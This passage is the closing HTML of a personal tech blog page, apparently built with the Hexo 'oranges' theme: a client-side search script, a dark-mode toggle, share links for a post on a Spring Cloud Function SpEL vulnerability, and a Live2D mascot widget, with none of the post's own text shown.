          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Spring%20Cloud%20Function%20SpEL%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%8F%8A%E5%A4%8D%E7%8E%B0 + '&url=' + https%3A%2F%2Fkpa1on.github.io%2F2022%2F03%2F29%2FSpring%2520Cloud%2520Function%2520SpEL%25E6%25BC%258F%25E6%25B4%259E%25E5%2588%2586%25E6%259E%2590%25E5%258F%258A%25E5%25A4%258D%25E7%258E%25B0%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://kpa1on.github.io/2022/03/29/Spring%20Cloud%20Function%20SpEL%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%8F%8A%E5%A4%8D%E7%8E%B0/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  <script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script></body>
</html>
